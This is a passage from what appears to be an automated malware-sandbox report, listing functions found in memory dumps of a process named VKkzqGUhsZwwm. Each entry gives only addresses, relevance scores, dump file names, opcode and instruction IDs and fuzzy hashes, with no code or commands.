                                  • Instruction Fuzzy Hash: D231C235B002018FDF19AB34E5A476E77A2AF85210F244578D406DB395DF3ACC46CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AAF3D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: e16f86f2a78ff49b021d975007802397c81fbfede0cc9820676984fd25f4d4a9
                                  • Instruction ID: b426d0322b87c3f3d87072dde77e6f0f00318f2119c0494368bffe7ffd3c75c6
                                  • Opcode Fuzzy Hash: e16f86f2a78ff49b021d975007802397c81fbfede0cc9820676984fd25f4d4a9
                                  • Instruction Fuzzy Hash: 3C31B034B002058FDB19AB34E6A476E7BA7AF89210F244978D406DB395DF36DC45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA6F78 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq
                                  • API String ID: 0-665714880
                                  • Opcode ID: d8daffa5bed3017e22f2690ea52af09506334fad2377c15c8c4e605cf3f1db5a
                                  • Instruction ID: 3bd3c4c25e935d620f1fa28fed851ef460fd588a7e081c933961ad88ebf815d4
                                  • Opcode Fuzzy Hash: d8daffa5bed3017e22f2690ea52af09506334fad2377c15c8c4e605cf3f1db5a
                                  • Instruction Fuzzy Hash: F8316131E102099BDB15CFA4D9A57AFF7B6FF85310F10852AE806EB250EF719942CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA6B88 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRjq
                                  • API String ID: 0-665714880
                                  • Opcode ID: 406b04f8ecf4de806bcd75e9bbfd7c0dc66948c55a571a45eefe270062c43f74
                                  • Instruction ID: 04febd86966d83aaf6c2a7c06486f9bd5c50a82f55d5dfb001d8076f155d85b7
                                  • Opcode Fuzzy Hash: 406b04f8ecf4de806bcd75e9bbfd7c0dc66948c55a571a45eefe270062c43f74
                                  • Instruction Fuzzy Hash: 662136756042518FC701EB78E06039A7BB9EF89315F1444AEC045CB2A5EF398C46CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA78EE Relevance: .6, Instructions: 568COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c95ba38aa3c3a144d2ed0ea5bb61d416b2c744d3cdffd31ffe7093600f69c4d8
                                  • Instruction ID: d934999448e44413c752cf33a6df0cfdfdc4c22c810b33fa518412d5cedc2d0f
                                  • Opcode Fuzzy Hash: c95ba38aa3c3a144d2ed0ea5bb61d416b2c744d3cdffd31ffe7093600f69c4d8
                                  • Instruction Fuzzy Hash: 5B222C387101058FCB19AB38E895B2D77AAFF89321B608939E405CB355DF76DC46DB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA7918 Relevance: .6, Instructions: 550COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc619d578c6aa1293a72d3cb47691266605a80af43b9dade59e3a2d6eb318027
                                  • Instruction ID: 90fa28612db9aabedd4cc13d9cb969479b8cbf25b0e04da51244ec6191807c44
                                  • Opcode Fuzzy Hash: fc619d578c6aa1293a72d3cb47691266605a80af43b9dade59e3a2d6eb318027
                                  • Instruction Fuzzy Hash: AC121A387101058FCB19AB78E895A2D76ABFF89321B608939E405CB355CF76DC46DB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA4A8C Relevance: .3, Instructions: 260COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f00f0dc53a4e55e499ce128bf7447388d10708a5db8bd2e776caeb91c2d334d
                                  • Instruction ID: 0711eb3962e5df6bfcfd8ae7a296e031901982c37bcfc85a6d59c88d15e11409
                                  • Opcode Fuzzy Hash: 1f00f0dc53a4e55e499ce128bf7447388d10708a5db8bd2e776caeb91c2d334d
                                  • Instruction Fuzzy Hash: 3CB15C70E00319CFDB10CFA9D99579DBBF2AF4C314F148129E819EB254EBB59885CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA9364 Relevance: .2, Instructions: 240COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38be98995333565adf5142ed4f481d3a27a236eec07507c4360723424c499421
                                  • Instruction ID: 6126ceee6467fb5a315ebf01f21a6105b80f6534195e2071a9173ad427f713f4
                                  • Opcode Fuzzy Hash: 38be98995333565adf5142ed4f481d3a27a236eec07507c4360723424c499421
                                  • Instruction Fuzzy Hash: 15916F34A00215DFCB14DB68D594AAEBBF2EF88315F248469E806D73A5DF35DC46CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA3E76 Relevance: .2, Instructions: 232COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1d80f4d1ebc7f0ee848604ba7220aa4f33651b5b4b6ae8ce7e3a66cb0c35add
                                  • Instruction ID: c527ba74522b691e79dc1b5bc92193abee1963b016d21b59d087b8cfb78497cd
                                  • Opcode Fuzzy Hash: d1d80f4d1ebc7f0ee848604ba7220aa4f33651b5b4b6ae8ce7e3a66cb0c35add
                                  • Instruction Fuzzy Hash: 3D9139B0E10209DFDF10CFA9D9A57DEBBF2AF48314F14812AE415AB254EB749885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AACC00 Relevance: .2, Instructions: 194COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e5ce943d5a87b7cbce1edd88218fb1658a497f970562dce2c79bd44155a2d7c
                                  • Instruction ID: 73512c45580d597a0243b5afc52f8a3ed322515e448192dae72acc7f3f1fc343
                                  • Opcode Fuzzy Hash: 4e5ce943d5a87b7cbce1edd88218fb1658a497f970562dce2c79bd44155a2d7c
                                  • Instruction Fuzzy Hash: 6C61BF72E105298BEB24CB59C9907BEF7B3FF84320F59896AC445AB241C734AD81CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA4810 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b863026064405277e213594a17fbfa9a380f23a684890945e559e22345750878
                                  • Instruction ID: 07ae79e4525e6bdb7745d9ccc2e5efdca46d3f74d2e48df5bfe0bcdd624285f1
                                  • Opcode Fuzzy Hash: b863026064405277e213594a17fbfa9a380f23a684890945e559e22345750878
                                  • Instruction Fuzzy Hash: 2B717AB1E00249CFDB10DFA9D99179EBBF2BF8C314F148129E415AB254EBB49841CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA4804 Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa27b68569f189dccde69e2e854d31bdd061b5268e03560852244a5c889982e0
                                  • Instruction ID: 5bd788cc82817c0fab26b50a74cc81763cfc8ea0218ccd5740ce7bf426821953
                                  • Opcode Fuzzy Hash: fa27b68569f189dccde69e2e854d31bdd061b5268e03560852244a5c889982e0
                                  • Instruction Fuzzy Hash: 177168B1E00249CFDB10CFA9D99579EBBF2BF8C314F148129E415AB254EBB49881CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA6CDC Relevance: .1, Instructions: 134COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15cd99200285b26961d678e3a5a8542c407ac97d9d4d6e49563546f42eb68a83
                                  • Instruction ID: ad6b23edbd18e778b873efb863782bf41d8d44226bd455840feb5009f60bd390
                                  • Opcode Fuzzy Hash: 15cd99200285b26961d678e3a5a8542c407ac97d9d4d6e49563546f42eb68a83
                                  • Instruction Fuzzy Hash: D85100B5E003188FDB14CFA9C894BADBBB5BF48714F188129D816AB294DB74A844CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA6CE8 Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c56658f7ce49a5498b90be2cad418d0b0657d4ffa08a6db0c7b2706d8bcc831
                                  • Instruction ID: 3942a40ea3ea8980baa0094c24b5490971e03d50d0bdd1bfc1a4dc9856b85cee
                                  • Opcode Fuzzy Hash: 9c56658f7ce49a5498b90be2cad418d0b0657d4ffa08a6db0c7b2706d8bcc831
                                  • Instruction Fuzzy Hash: 07511171E002188FDF14CFAAC894B9DBBB5BF48714F188019D816BB3A4DB74A844CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA96E0 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 74f8b02d70a0acb215d24abdcfc38ca0c3e463d6f0307d145693ac85424d0c06
                                  • Instruction ID: 47d030341a1b3df90f3e29fd5df4f8512de5c641c609e09a6f9d0575a873cac2
                                  • Opcode Fuzzy Hash: 74f8b02d70a0acb215d24abdcfc38ca0c3e463d6f0307d145693ac85424d0c06
                                  • Instruction Fuzzy Hash: 86416F34F002068BDF649FA9D6E077FB766EF89610F20482AD51ADB394DB35DC418B92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA112A Relevance: .1, Instructions: 115COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06991ce15e5c56c7926f87388fe7c74ef058a76b30510773b78132afdb89036e
                                  • Instruction ID: a0db262d677969e1036664d9df116de477d4cdeec560e0f1690340a42c3177f1
                                  • Opcode Fuzzy Hash: 06991ce15e5c56c7926f87388fe7c74ef058a76b30510773b78132afdb89036e
                                  • Instruction Fuzzy Hash: 635124796821458FCB19FFA9F985E583F76FB923057008A69D0008B2BDDB30691FCB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA1138 Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4be4a935cacc0cb33bd3730a9b85ab93368cdf78e4681b20ed0619985b7a0fc
                                  • Instruction ID: 4cd16b4d7fbb1649c47b513a78d5d951050c04dadb0b2a470c04126a5e20fb79
                                  • Opcode Fuzzy Hash: b4be4a935cacc0cb33bd3730a9b85ab93368cdf78e4681b20ed0619985b7a0fc
                                  • Instruction Fuzzy Hash: 7F51E3796821459FCB19FFA9F985E683F76FB923057004A69D0048B2BDDB70691FCB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AAF289 Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a809b25cce3932c570480790e23e11306f6015550dfd706b977156d85db1d79a
                                  • Instruction ID: 4e28893f5beac63f00c469d1f3409c0121c3478a4c1aecdd3a06ec7e9a1c695b
                                  • Opcode Fuzzy Hash: a809b25cce3932c570480790e23e11306f6015550dfd706b977156d85db1d79a
                                  • Instruction Fuzzy Hash: A0316935E102059FCB19CFA4D9A46AEB7B2FF89310F10C929E816E7754EB75A842CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA26DC Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7c7ba3a3742f926afd88b0395b31b6081c8cbe064c01577b613dd6f99d939af
                                  • Instruction ID: 4e69af6068b204c0ada1602aacc85c2474282d4d6862c734497aed06c168d33b
                                  • Opcode Fuzzy Hash: b7c7ba3a3742f926afd88b0395b31b6081c8cbe064c01577b613dd6f99d939af
                                  • Instruction Fuzzy Hash: B841FEB4D00349DFDB10CFA9C990ADEBFB5FF48314F24802AE819AB254DB75A945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA5098 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 91529fe7f48f698fd0eb999bee3877845ed853b32e7a3c0625fec3bd27adff21
                                  • Instruction ID: 3ed6f49a1bd45e4255e2474c6966fe12373771bbf56ee5a7c82f104046967ffe
                                  • Opcode Fuzzy Hash: 91529fe7f48f698fd0eb999bee3877845ed853b32e7a3c0625fec3bd27adff21
                                  • Instruction Fuzzy Hash: FE312938E00215CFDB24EB68CAA56AE77F2EF89344F500568D506AB3A4DF36DC45CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AAF298 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80fe94c8555248d7cf48d74264d8f9890713cf8f546ce6aced84c601944d3c09
                                  • Instruction ID: 4688c0062d36b43802482ff2d4dff8c8762a014d50de37f71fb183c788c7a605
                                  • Opcode Fuzzy Hash: 80fe94c8555248d7cf48d74264d8f9890713cf8f546ce6aced84c601944d3c09
                                  • Instruction Fuzzy Hash: E5314B35E102059FCB19CFA4D5A46AEB7B2EF89310F10C929E816E7754DF75AC42CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA26E8 Relevance: .1, Instructions: 90COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c2edbe63958322be840f017ab0db483e62a9c7512716e9d849f97a9351eb603
                                  • Instruction ID: 5a135af15044cb7e108280309170bbfa054613aaa85122fad6d2e4fd9e2981c4
                                  • Opcode Fuzzy Hash: 2c2edbe63958322be840f017ab0db483e62a9c7512716e9d849f97a9351eb603
                                  • Instruction Fuzzy Hash: 9C41EBB0D00249DFDB14DFA9C994ADEBFB5FF48310F24802AE819AB254DB75A945CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA50A8 Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8095556d7de0a41b7bbdb52a80cc3f5886c8d335787e94c8d25bf4dd50081a2c
                                  • Instruction ID: 5b7c6f7f487482ec7a20e29416c4d182577968642900339c66def6547065a01e
                                  • Opcode Fuzzy Hash: 8095556d7de0a41b7bbdb52a80cc3f5886c8d335787e94c8d25bf4dd50081a2c
                                  • Instruction Fuzzy Hash: 9B312738E00215CFDB28EB74C6656AE77B2EF89344F500568D406AB3A4DF36DC45CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA9250 Relevance: .1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d9f91ed2156a98b20e68c8287cfa47d44c809180d147105f2a79f55104d20ee
                                  • Instruction ID: ae8dbcb1e84c64892ae09fd17311d15928481c65c7465a5e0560222351c21aaf
                                  • Opcode Fuzzy Hash: 2d9f91ed2156a98b20e68c8287cfa47d44c809180d147105f2a79f55104d20ee
                                  • Instruction Fuzzy Hash: 3B31AC30E1020A9BCB05CFA8D9907AFFBB6FF89310F50C529E805EB255DB719846CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA9260 Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 158583ac47da19cf079378eb2ce889b57fb1f3124dd6af469005152b1ff16770
                                  • Instruction ID: 3e6d880eaa915b4c36f0da087b2d2ae18039b4041b10f39960de41799bfac102
                                  • Opcode Fuzzy Hash: 158583ac47da19cf079378eb2ce889b57fb1f3124dd6af469005152b1ff16770
                                  • Instruction Fuzzy Hash: C6218D34E1020A9BDB05CFA4D59079FF7B6FF89310F10C629E805EB255DB719846CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA16A0 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 01c9b6237c5b3e37aa234d38570344779a76da748af9b25986e0c98b6180a355
                                  • Instruction ID: 9033482150a4ea8f5e03eb89aaaf37995f33f23a731468a8975535b555d4f0e6
                                  • Opcode Fuzzy Hash: 01c9b6237c5b3e37aa234d38570344779a76da748af9b25986e0c98b6180a355
                                  • Instruction Fuzzy Hash: 542145786101019FDF16EBA8F9D4B6D3769EF85314F105925D00ACB2A9EF38DC46CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA1382 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7b32629e49dcefee2f7f18bebceb8c0b3b739d7b1140f16936dbdbb946f6375
                                  • Instruction ID: fa855a336abac3e3495f990173b191f9d142e7cf76bed8f56b84f72ade47f094
                                  • Opcode Fuzzy Hash: b7b32629e49dcefee2f7f18bebceb8c0b3b739d7b1140f16936dbdbb946f6375
                                  • Instruction Fuzzy Hash: 48218CB8A003006FEF656B68E5E973C3B69EF42315F144869E40EC7690EF29C9868757
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 028DD01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3232679069.00000000028DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_28dd000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 777eee303b35a71fb34de68b1a1ba5d5741cd247127d2ceab543143cb5a3f0ac
                                  • Instruction ID: ca010979fa7fc8aae48def13a7520a0a265e0d44223bb3f7e4ca0a2f3d18e3a4
                                  • Opcode Fuzzy Hash: 777eee303b35a71fb34de68b1a1ba5d5741cd247127d2ceab543143cb5a3f0ac
                                  • Instruction Fuzzy Hash: AA21D07A604204DFDB14DF24D984B26BB65EB88318F64C569D90A8B256C33AD80BCAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA9150 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aad827d8f4d8f2271640de32933aae1eaca090b391faf3390c55803fc22b8fd2
                                  • Instruction ID: f7ea0ab8ec2e79db5ea58cce273d9b25be2435325e3fc422d09abcbb97adc403
                                  • Opcode Fuzzy Hash: aad827d8f4d8f2271640de32933aae1eaca090b391faf3390c55803fc22b8fd2
                                  • Instruction Fuzzy Hash: 30218375E00206DBDB19CFA4D5A46EEF7B2AF49310F20892AE815FB351EF709946CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA17C0 Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b366d0571409feec75d5fd88afcc12e36eb31acad5b9b15617e60cab96437c4
                                  • Instruction ID: 7e5c02fc2afa6ea9b085ea0801fc82c06dcb9bde4b4a43ee598e6fb75169016e
                                  • Opcode Fuzzy Hash: 2b366d0571409feec75d5fd88afcc12e36eb31acad5b9b15617e60cab96437c4
                                  • Instruction Fuzzy Hash: 7D21F376E04340AFDB119BB8E9A565E7BF5EB48650F48082AE949C3344EB348802CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA9160 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2aa0000_VKkzqGUhsZwwm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2434dc8a204882bd492aff37ffe4ada0c9e596255960d0b79bbc0c52d0e9b5a1
                                  • Instruction ID: d4980ab0925a69c03999b722eecb1e863f259f4a0bcf49814b85401085b1acc1
                                  • Opcode Fuzzy Hash: 2434dc8a204882bd492aff37ffe4ada0c9e596255960d0b79bbc0c52d0e9b5a1
                                  • Instruction Fuzzy Hash: 4B216234E0020A9BDB19CFA5D9946DFF7B2AF89310F20852AE815FB351EF719945CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02AA1888 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3233119337.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
